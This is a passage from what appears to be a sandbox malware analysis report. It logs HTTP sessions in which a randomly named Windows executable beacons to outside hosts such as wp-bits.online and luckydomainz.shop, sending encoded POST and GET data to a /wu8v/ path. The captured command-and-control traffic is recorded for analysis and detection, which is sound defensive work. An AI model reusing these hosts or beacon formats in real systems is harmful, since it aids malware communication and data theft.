                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:06:08.383965015 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:06:05 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1163
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:08.383979082 CEST53INData Raw: 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.449752116.203.164.244802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:14.586652994 CEST724OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.wp-bits.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.wp-bits.online
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.wp-bits.online/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 73 2b 63 33 42 61 64 66 39 74 32 4a 79 66 52 43 38 38 63 30 38 35 61 77 48 79 4c 47 6a 32 53 4f 69 64 56 54 39 4a 63 6f 7a 62 42 47 48 74 72 74 4e 58 41 38 30 68 38 35 76 46 4a 69 4f 6c 67 69 65 48 31 66 52 4f 50 2f 73 4a 72 4e 2f 44 6d 45 6f 39 35 61 68 47 32 37 32 6c 48 36 32 62 36 77 7a 6f 54 73 48 65 35 6b 53 42 37 6f 53 49 7a 44 39 38 61 42 7a 77 4d 52 65 77 33 57 4e 58 4d 51 62 77 51 56 69 4e 4e 6d 59 63 4b 70 41 6e 52 54 42 48 65 51 71 41 58 7a 38 68 63 30 38 69 6c 6d 50 71 37 7a 6f 47 48 46 79 6e 61 4b 69 49 4d 56 36 31 77 37 30 61 30 61 5a 2b 77 42 79 73 55 42 7a 41 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=s+c3Badf9t2JyfRC88c085awHyLGj2SOidVT9JcozbBGHtrtNXA80h85vFJiOlgieH1fROP/sJrN/DmEo95ahG272lH62b6wzoTsHe5kSB7oSIzD98aBzwMRew3WNXMQbwQViNNmYcKpAnRTBHeQqAXz8hc08ilmPq7zoGHFynaKiIMV61w70a0aZ+wBysUBzA==
                                                                                                                    May 8, 2024 14:06:14.917412043 CEST346INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:06:14 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: br
                                                                                                                    Data Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.449753116.203.164.244802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:17.442826986 CEST744OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.wp-bits.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.wp-bits.online
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.wp-bits.online/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 73 2b 63 33 42 61 64 66 39 74 32 4a 79 2f 68 43 76 4c 67 30 74 70 61 78 62 69 4c 47 71 57 53 43 69 64 52 54 39 4c 77 34 30 70 31 47 48 50 7a 74 4d 53 67 38 33 68 38 35 37 56 4a 74 57 46 67 66 65 48 78 58 52 50 7a 2f 73 4e 37 4e 2f 43 57 45 6f 75 68 5a 75 32 32 35 36 46 48 34 72 4c 36 77 7a 6f 54 73 48 65 46 65 53 42 6a 6f 52 34 6a 44 36 70 32 41 74 67 4d 65 49 41 33 57 61 6e 4d 55 62 77 52 41 69 4a 74 41 59 5a 47 70 41 6e 42 54 43 53 71 54 67 41 58 39 34 68 64 6d 38 51 73 4e 52 66 53 2b 70 58 53 6a 77 47 2b 64 75 75 64 50 72 45 52 73 6d 61 51 70 45 35 35 31 2f 76 70 49 6f 4d 35 50 36 64 61 72 74 76 44 4f 6e 74 4d 62 46 58 55 59 31 43 45 3d
                                                                                                                    Data Ascii: MdtlcTm=s+c3Badf9t2Jy/hCvLg0tpaxbiLGqWSCidRT9Lw40p1GHPztMSg83h857VJtWFgfeHxXRPz/sN7N/CWEouhZu2256FH4rL6wzoTsHeFeSBjoR4jD6p2AtgMeIA3WanMUbwRAiJtAYZGpAnBTCSqTgAX94hdm8QsNRfS+pXSjwG+duudPrERsmaQpE551/vpIoM5P6dartvDOntMbFXUY1CE=
                                                                                                                    May 8, 2024 14:06:17.769128084 CEST346INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:06:17 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: br
                                                                                                                    Data Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.449754116.203.164.244802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:21.246359110 CEST10826OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.wp-bits.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.wp-bits.online
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.wp-bits.online/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 73 2b 63 33 42 61 64 66 39 74 32 4a 79 2f 68 43 76 4c 67 30 74 70 61 78 62 69 4c 47 71 57 53 43 69 64 52 54 39 4c 77 34 30 70 4e 47 47 38 37 74 4d 7a 67 38 32 68 38 35 6e 6c 49 71 57 46 67 34 65 48 4a 54 52 50 2f 46 73 50 7a 4e 2b 6b 4b 45 35 76 68 5a 31 6d 32 35 6e 31 48 39 32 62 36 68 7a 70 6a 6f 48 65 31 65 53 42 6a 6f 52 37 4c 44 73 73 61 41 76 67 4d 52 65 77 32 45 4e 58 4d 6f 62 77 49 37 69 4a 70 50 59 74 36 70 4f 6a 64 54 4f 41 43 54 73 41 58 2f 31 42 63 6a 38 51 77 53 52 62 4b 59 70 58 6e 47 77 46 69 64 74 49 41 44 78 41 45 7a 35 34 49 4d 5a 34 42 71 79 64 45 4c 72 50 46 54 38 64 61 74 37 63 76 71 6b 63 35 71 51 48 6f 6a 6d 33 41 59 76 69 6e 5a 41 48 2f 61 68 79 66 48 50 4f 5a 76 44 4f 62 6f 4f 47 41 4f 78 73 33 73 35 2f 56 57 35 67 42 62 57 77 4b 69 30 38 55 69 37 34 77 47 56 34 5a 6f 7a 46 47 44 68 57 37 75 37 65 69 69 4a 4b 52 63 77 67 62 64 5a 43 6c 59 59 6d 67 53 75 4d 45 6a 6d 6d 7a 71 6c 78 73 77 4b 30 50 37 78 72 48 54 46 50 4e 4f 4f 6d 2f 4b 51 47 4e 30 57 59 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=s+c3Badf9t2Jy/hCvLg0tpaxbiLGqWSCidRT9Lw40pNGG87tMzg82h85nlIqWFg4eHJTRP/FsPzN+kKE5vhZ1m25n1H92b6hzpjoHe1eSBjoR7LDssaAvgMRew2ENXMobwI7iJpPYt6pOjdTOACTsAX/1Bcj8QwSRbKYpXnGwFidtIADxAEz54IMZ4BqydELrPFT8dat7cvqkc5qQHojm3AYvinZAH/ahyfHPOZvDOboOGAOxs3s5/VW5gBbWwKi08Ui74wGV4ZozFGDhW7u7eiiJKRcwgbdZClYYmgSuMEjmmzqlxswK0P7xrHTFPNOOm/KQGN0WY3zjS3iUXma5buBDHYvCXGA9dj7p6qdUmhpichAfgO/Df/jNWTEDL46DUqb0Hp2Le1up1n06/GOu3K/M9QErteZD8vdUKtvrajniXn/8QQOH6IcDqYhyTTbZS5/h87kOBMe84tp/SuKro4a5QWCls+p6F5EXmQ0GJ2Gb/UAWwPMhKPNm/IEGgYln0zxJ8fmxqQyd2JjiA886vRjRVwBZiEHdvxbtJ2f09n8HgIEWuA3nOu0SdKBsPmO/k7nqa49bmuwmsT2SesFcaWXPRwO/4kro3i1chOTHwKm1o59W3pUTP08uZx/BOBCB1utLLlhxQxJOrUgmLxxA1J/Td0qXk9n9/tMtg2obXXc6eO5UoIEr1JlPK1wo4IyV39SaLsYohuYbqfA5swo5COwOUR8L0smBZMLlXYRHWydERoxn4fRxF1jG4XZY+ayfHAZIjxFb1T/5I/SlqRmbmf94DMKgFfw7eJ3PCZDYPoeD/x2nK14lG7UZrc7LuVhDL//MsxRdjMpbyC7O861MtH+eL9lHtZZ2oLVAnv+O9dp+zDjMF6mwCB3IgUVREik9lB7qd3aGs4Ax5zoqD53KpzmPAJygmihbpI+V6/tWAH4piKdhyU5Judn/84H5wcTnqpDgIluQAmTNxVSL/DmFtfiwVK5Yz+VGRb2tY9Z/boy [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:21.592740059 CEST346INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:06:21 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: br
                                                                                                                    Data Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.449755116.203.164.244802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:24.167381048 CEST457OUTGET /wu8v/?MdtlcTm=h80XCq9V6N6s/txg4v4Fr8zmHDyj0DPil4lDzKoi2YAFaI23LxlO/y0x83EXcngteSl0Ff377sWS2kC2x8x2lEbqmRL/y9GY06LsNZ5NdSPXBqH5i7fNvls=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.wp-bits.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:06:24.496562958 CEST359INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:06:24 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.44975691.195.240.19802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:30.047672987 CEST733OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.luckydomainz.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.luckydomainz.shop
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.luckydomainz.shop/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 56 74 64 72 46 6e 6c 70 4c 79 6e 63 37 78 6c 46 61 6c 54 4e 70 4f 4d 6e 62 30 35 38 74 77 62 34 65 52 4b 53 75 64 62 39 52 76 71 4c 4b 4f 42 55 71 30 7a 4d 6f 36 43 56 6a 42 46 6f 57 32 71 76 31 6b 6f 63 70 6a 49 41 76 54 48 4d 6a 42 45 6f 66 46 38 62 47 61 38 77 72 41 74 4b 4b 44 4e 31 72 79 6b 62 4f 35 78 41 4d 6f 75 71 34 61 55 61 64 30 6e 4d 70 68 4f 42 43 43 4b 43 79 31 45 36 34 50 36 73 6a 33 56 46 4b 47 69 41 45 66 43 37 68 33 43 38 55 50 49 44 4d 7a 4f 30 4e 58 2f 45 63 6a 76 46 72 49 71 50 59 78 46 38 76 77 4b 6e 72 79 46 49 4e 43 74 41 71 59 53 44 65 51 75 52 34 67 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=VtdrFnlpLync7xlFalTNpOMnb058twb4eRKSudb9RvqLKOBUq0zMo6CVjBFoW2qv1kocpjIAvTHMjBEofF8bGa8wrAtKKDN1rykbO5xAMouq4aUad0nMphOBCCKCy1E64P6sj3VFKGiAEfC7h3C8UPIDMzO0NX/EcjvFrIqPYxF8vwKnryFINCtAqYSDeQuR4g==
                                                                                                                    May 8, 2024 14:06:30.359081984 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:06:30 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.44975791.195.240.19802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:32.886626005 CEST753OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.luckydomainz.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.luckydomainz.shop
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.luckydomainz.shop/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 56 74 64 72 46 6e 6c 70 4c 79 6e 63 71 67 56 46 62 47 4c 4e 6c 2b 4d 6b 52 55 35 38 6d 51 62 38 65 52 57 53 75 63 66 74 51 63 4f 4c 4b 76 78 55 6c 56 7a 4d 76 36 43 56 33 78 46 74 49 47 71 65 31 6b 73 2b 70 6e 4d 41 76 54 44 4d 6a 41 30 6f 65 79 67 59 55 61 38 79 74 41 74 49 55 7a 4e 31 72 79 6b 62 4f 34 55 6c 4d 72 65 71 34 72 45 61 53 31 6e 4e 67 42 4f 43 57 53 4b 43 32 31 45 2b 34 50 37 44 6a 79 4e 72 4b 46 4b 41 45 65 79 37 68 69 69 39 65 50 49 42 43 54 50 41 41 69 65 76 45 43 71 6f 72 34 69 62 5a 6c 42 61 71 32 62 39 36 44 6b 66 66 43 4a 7a 33 66 62 33 54 54 54 59 6a 73 6a 64 57 44 4c 4a 69 68 6c 79 6f 44 6e 79 31 73 51 52 4f 7a 38 3d
                                                                                                                    Data Ascii: MdtlcTm=VtdrFnlpLyncqgVFbGLNl+MkRU58mQb8eRWSucftQcOLKvxUlVzMv6CV3xFtIGqe1ks+pnMAvTDMjA0oeygYUa8ytAtIUzN1rykbO4UlMreq4rEaS1nNgBOCWSKC21E+4P7DjyNrKFKAEey7hii9ePIBCTPAAievECqor4ibZlBaq2b96DkffCJz3fb3TTTYjsjdWDLJihlyoDny1sQROz8=
                                                                                                                    May 8, 2024 14:06:33.202363968 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:06:33 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
